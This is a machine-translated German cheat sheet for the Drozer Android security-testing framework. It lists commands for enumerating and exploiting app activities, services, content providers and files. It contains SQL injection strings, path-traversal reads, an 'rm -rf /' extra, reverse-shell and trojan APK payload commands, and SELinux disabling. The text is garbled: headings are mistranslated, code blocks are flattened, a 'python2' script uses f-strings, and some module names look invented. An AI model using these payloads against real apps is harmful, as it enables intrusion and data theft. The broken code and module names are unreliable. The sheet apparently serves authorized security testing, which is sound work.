Drozer Cheat Sheet¶
Überblick¶
Drozer ist ein umfassendes Sicherheitstest-Framework für Android-Anwendungen. Es ermöglicht Ihnen, die Rolle einer Android-App zu übernehmen und mit dem Dalvik VM, den IPC-Endpunkten anderer Apps und dem darunter liegenden Betriebssystem zu interagieren. Drozer bietet Tools zur Fernausbeutung von Android-Geräten durch bösartige Anwendungen und umfassende Sicherheitsbewertung von Android-Anwendungen.
ZEIT Warning: Verwenden Sie Drozer nur auf Geräten und Anwendungen, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben. Unberechtigte Nutzung kann gegen Nutzungsbedingungen oder lokale Gesetze verstoßen.
Installation¶
Voraussetzungen¶
```bash
Install Java Development Kit¶
sudo apt update sudo apt install openjdk-11-jdk
Install Python 2.7 (required for Drozer)¶
sudo apt install python2.7 python2.7-dev python-pip
Install Android SDK and ADB¶
sudo apt install android-tools-adb android-tools-fastboot
Set JAVA_HOME environment variable¶
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc ```_
Linux Installation¶
```bash
Download Drozer¶
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
Install Drozer¶
pip2 install drozer-2.4.4-py2-none-any.whl
Alternative: Install from source¶
git clone https://github.com/FSecureLABS/drozer.git cd drozer python2 setup.py install ```_
macOS Installation¶
```bash
Install Homebrew (if not already installed)¶
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Install Python 2.7¶
brew install python@2
Install Drozer¶
pip2 install drozer
Download Drozer agent APK¶
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk ```_
Windows Installation¶
```bash
Install Python 2.7 from python.org¶
Download and install from: https://www.python.org/downloads/release/python-2718/¶
Install Drozer using pip¶
pip install drozer
Download Drozer agent APK¶
Download from: https://github.com/FSecureLABS/drozer/releases/¶
```_
Android Device Setup¶
```bash
Enable USB debugging on Android device¶
Settings > Developer Options > USB Debugging¶
Install Drozer agent on device¶
adb install drozer-agent-2.4.4.apk
Start Drozer agent on device¶
Open Drozer Agent app and toggle "Embedded Server" ON¶
Forward port for communication¶
adb forward tcp:31415 tcp:31415 ```_
Basisnutzung¶
Verbindung mit Gerät¶
```bash
Connect to Drozer agent¶
drozer console connect
Connect with specific endpoint¶
drozer console connect --server 192.168.1.100:31415
List available devices¶
drozer console devices
Connect to specific device¶
drozer console connect --device
Grundlegende Befehle¶
```bash
List available modules¶
dz> list
Get help for specific module¶
dz> help app.package.list
List installed packages¶
dz> run app.package.list
Get package information¶
dz> run app.package.info -a com.example.app
List activities¶
dz> run app.activity.info -a com.example.app
List services¶
dz> run app.service.info -a com.example.app
List broadcast receivers¶
dz> run app.broadcast.info -a com.example.app ```_
Paketanalyse¶
Angebotsinformationen¶
```bash
List all packages¶
dz> run app.package.list
List packages with filter¶
dz> run app.package.list -f keyword
Get detailed package information¶
dz> run app.package.info -a com.example.app
List package permissions¶
dz> run app.package.info -a com.example.app -p
Find packages with specific permission¶
dz> run app.package.list -p android.permission.INTERNET
List system packages¶
dz> run app.package.list -f system
List third-party packages¶
dz> run app.package.list -3 ```_
Anwendungskomponenten¶
```bash
List activities¶
dz> run app.activity.info -a com.example.app
List exported activities¶
dz> run app.activity.info -a com.example.app -e
List services¶
dz> run app.service.info -a com.example.app
List exported services¶
dz> run app.service.info -a com.example.app -e
List broadcast receivers¶
dz> run app.broadcast.info -a com.example.app
List exported broadcast receivers¶
dz> run app.broadcast.info -a com.example.app -e
List content providers¶
dz> run app.provider.info -a com.example.app
List exported content providers¶
dz> run app.provider.info -a com.example.app -e ```_
Aktivitätstests¶
Aktivitätszählung¶
```bash
Find activities in package¶
dz> run app.activity.info -a com.example.app
Find exported activities¶
dz> run app.activity.info -a com.example.app -e
Find activities with intent filters¶
dz> run app.activity.info -a com.example.app -i
Search for activities by permission¶
dz> run app.activity.info -p android.permission.CAMERA ```_
Aktivitäten Exploitation¶
```bash
Start activity¶
dz> run app.activity.start --component com.example.app com.example.MainActivity
Start activity with extras¶
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret
Start activity with intent data¶
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data
Start activity with specific action¶
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com
Test for intent injection¶
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true ```_
Service Testing¶
Service Enumeration¶
```bash
List services in package¶
dz> run app.service.info -a com.example.app
List exported services¶
dz> run app.service.info -a com.example.app -e
Find services with specific permissions¶
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN ```_
Service Exploitation¶
```bash
Start service¶
dz> run app.service.start --component com.example.app com.example.BackgroundService
Start service with extras¶
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"
Send intent to service¶
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"
Test service binding¶
dz> run app.service.bind com.example.app com.example.BackgroundService ```_
Content Provider Testing¶
Inhaltsanbieter Aufzählung¶
```bash
List content providers¶
dz> run app.provider.info -a com.example.app
List exported content providers¶
dz> run app.provider.info -a com.example.app -e
Find URIs for content provider¶
dz> run app.provider.finduri com.example.provider
Scan for accessible content URIs¶
dz> run scanner.provider.finduris -a com.example.app ```_
Content Provider Exploitation¶
```bash
Query content provider¶
dz> run app.provider.query content://com.example.provider/users
Query with selection¶
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin
Insert data into content provider¶
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret
Update data in content provider¶
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword
Delete data from content provider¶
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"
Test for SQL injection¶
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"
Read files via content provider¶
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts
Download files¶
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt ```_
Broadcast Receiver Test¶
Broadcast Receiver Enumeration¶
```bash
List broadcast receivers¶
dz> run app.broadcast.info -a com.example.app
List exported broadcast receivers¶
dz> run app.broadcast.info -a com.example.app -e
Find receivers for specific intent¶
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED ```_
Rundfunkempfänger Exploitation¶
```bash
Send broadcast intent¶
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION
Send broadcast with extras¶
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"
Send system broadcasts¶
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED
Send ordered broadcast¶
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high
Test for broadcast injection¶
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true ```_
Dateisystemanalyse¶
Dateisystem Aufzählung¶
```bash
List application files¶
dz> run tools.file.list /data/data/com.example.app/
Find readable files¶
dz> run tools.file.readable /data/data/com.example.app/
Find writable files¶
dz> run tools.file.writable /data/data/com.example.app/
Search for files with specific patterns¶
dz> run tools.file.find /data/data/com.example.app/ "*.db"
Find world-readable files¶
dz> run tools.file.permissions /data/data/com.example.app/ ```_
Dateisystem Exploitation¶
```bash
Read file contents¶
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml
Download file¶
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db
Upload file¶
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so
Create symbolic link¶
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt
Change file permissions¶
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt ```_
Datenbankanalyse¶
SQLite Datenbank Testing¶
```bash
Find SQLite databases¶
dz> run tools.file.find /data/data/com.example.app/ "*.db"
Connect to SQLite database¶
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db
List tables in database¶
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db
Query database¶
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"
Test for SQL injection in content providers¶
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"
Dump database schema¶
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db
Export database¶
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql ```_
Netzwerkanalyse¶
Netzwerkkonfiguration¶
```bash
Check network security config¶
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml
List network interfaces¶
dz> run tools.setup.network
Check for cleartext traffic¶
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app
Test for certificate pinning bypass¶
dz> run scanner.misc.checkpinning -a com.example.app ```_
SSL/TLS Testing¶
```bash
Test SSL certificate validation¶
dz> run scanner.misc.native -a com.example.app
Check for weak SSL implementations¶
dz> run scanner.misc.checkssl -a com.example.app
Test for certificate transparency¶
dz> run scanner.misc.checkcertificatetransparency -a com.example.app ```_
Erweiterte Nutzung¶
Personalentwicklung¶
```python
Create custom Drozer module¶
File: ~/.drozer_modules/custom/exploit.py¶
from drozer.modules import common, Module
class CustomExploit(Module, common.FileSystem, common.PackageManager): name = "Custom Exploit Module" description = "Custom exploitation module" examples = "run custom.exploit -a com.example.app" author = "Security Researcher" date = "2024-01-01" license = "BSD (3 clause)" path = ["custom"]
def add_arguments(self, parser):
parser.add_argument("-a", "--package", help="target package")
def execute(self, arguments):
if arguments.package:
self.stdout.write("Exploiting package: %s\n" % arguments.package)
# Custom exploitation logic here
else:
self.stdout.write("Please specify target package\n")
```_
Nutzlasterzeugung¶
```bash
Generate malicious APK¶
dz> run payload.apk.create --output /tmp/malicious.apk
Generate reverse shell payload¶
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444
Generate bind shell payload¶
dz> run payload.bind.shell --port 4444
Embed payload in legitimate APK¶
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk ```_
Vorrechte Eskalation¶
```bash
Check for root access¶
dz> run tools.setup.busybox
Exploit setuid binaries¶
dz> run exploit.setuid.find
Test for kernel exploits¶
dz> run exploit.kernel.check
Exploit application vulnerabilities¶
dz> run exploit.app.privilege -a com.example.app
Test for directory traversal¶
dz> run exploit.traversal.test -a com.example.app ```_
Automatisierungsskripte¶
Umfassendes Beurteilungsskript¶
```python
!/usr/bin/env python2¶
import subprocess import json import sys
class DrozerAutomation: def init(self, package_name): self.package = package_name self.results = \\{\\}
def run_drozer_command(self, command):
"""Execute Drozer command and return output"""
try:
cmd = ["drozer", "console", "connect", "-c", command]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
return output.decode('utf-8')
except subprocess.CalledProcessError as e:
return f"Error: \\\\{e.output.decode('utf-8')\\\\}"
def analyze_package(self):
"""Perform comprehensive package analysis"""
print(f"[+] Analyzing package: \\\\{self.package\\\\}")
# Package information
self.results['package_info'] = self.run_drozer_command(
f"run app.package.info -a \\\\{self.package\\\\}"
)
# Activities
self.results['activities'] = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\}"
)
# Services
self.results['services'] = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\}"
)
# Content Providers
self.results['providers'] = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\}"
)
# Broadcast Receivers
self.results['receivers'] = self.run_drozer_command(
f"run app.broadcast.info -a \\\\{self.package\\\\}"
)
return self.results
def test_exported_components(self):
"""Test exported components for vulnerabilities"""
print("[+] Testing exported components")
# Test exported activities
exported_activities = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\} -e"
)
# Test exported services
exported_services = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\} -e"
)
# Test exported providers
exported_providers = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\} -e"
)
return \\\\{
'exported_activities': exported_activities,
'exported_services': exported_services,
'exported_providers': exported_providers
\\\\}
def test_content_providers(self):
"""Test content providers for vulnerabilities"""
print("[+] Testing content providers")
# Find URIs
uris = self.run_drozer_command(
f"run app.provider.finduri \\\\{self.package\\\\}"
)
# Scan for accessible URIs
accessible_uris = self.run_drozer_command(
f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
)
return \\\\{
'uris': uris,
'accessible_uris': accessible_uris
\\\\}
def generate_report(self):
"""Generate comprehensive security report"""
report = \\\\{
'package': self.package,
'analysis_results': self.results,
'exported_components': self.test_exported_components(),
'content_provider_tests': self.test_content_providers()
\\\\}
with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
return report
Usage¶
if name == "main":
if len(sys.argv) != 2:
print("Usage: python2 drozer_automation.py
package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()
```_
Batch Testing Script¶
```bash
!/bin/bash¶
Batch testing script for multiple packages¶
PACKAGES_FILE="packages.txt" RESULTS_DIR="drozer_results"
mkdir -p $RESULTS_DIR
while IFS= read -r package; do echo "[+] Testing package: $package"
# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"
# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"
# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"
# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"
echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"
echo "[+] Batch testing completed" ```_
Fehlerbehebung¶
Verbindungsprobleme¶
```bash
Check if Drozer agent is running¶
adb shell am start -n com.mwr.dz/.activities.MainActivity
Verify port forwarding¶
adb forward --list adb forward tcp:31415 tcp:31415
Restart ADB server¶
adb kill-server adb start-server
Check device connectivity¶
adb devices
Test connection manually¶
telnet localhost 31415 ```_
Aufgaben¶
```bash
Reinstall Drozer agent¶
adb uninstall com.mwr.dz adb install drozer-agent-2.4.4.apk
Check agent permissions¶
adb shell dumpsys package com.mwr.dz
Enable agent in device settings¶
Settings > Apps > Drozer Agent > Permissions¶
Check if agent service is running¶
adb shell ps|grep drozer ```_
Modulfragen¶
```bash
Refresh module list¶
dz> reload
Check module path¶
dz> list
Install custom modules¶
mkdir -p ~/.drozer_modules cp custom_module.py ~/.drozer_modules/
Debug module loading¶
dz> help custom.module ```_
Genehmigungsfragen¶
```bash
Check required permissions¶
adb shell dumpsys package com.example.app|grep permission
Grant permissions manually¶
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE
Check SELinux status¶
adb shell getenforce
Disable SELinux (if rooted)¶
adb shell su -c "setenforce 0" ```_
Leistungsfragen¶
```bash
Increase timeout values¶
dz> set timeout 30
Reduce output verbosity¶
dz> set verbose false
Clear cache¶
rm -rf ~/.drozer/cache/
Use specific device¶
drozer console connect --device
Ressourcen¶
- offizielle Drozer-Dokumentation
- Drozer GitHub Repository
- [Drozer User Guide](LINK_7
- Android Security Testing with Drozer
- [OWASP Mobile Security Testing Guide](LINK_7
- [Android Application Security](LINK_7
- [Drozer Modulentwicklung](LINK_7
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Drozer für Android-Anwendung Sicherheitstests. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie alle Android-Anwendungen oder Geräte testen. *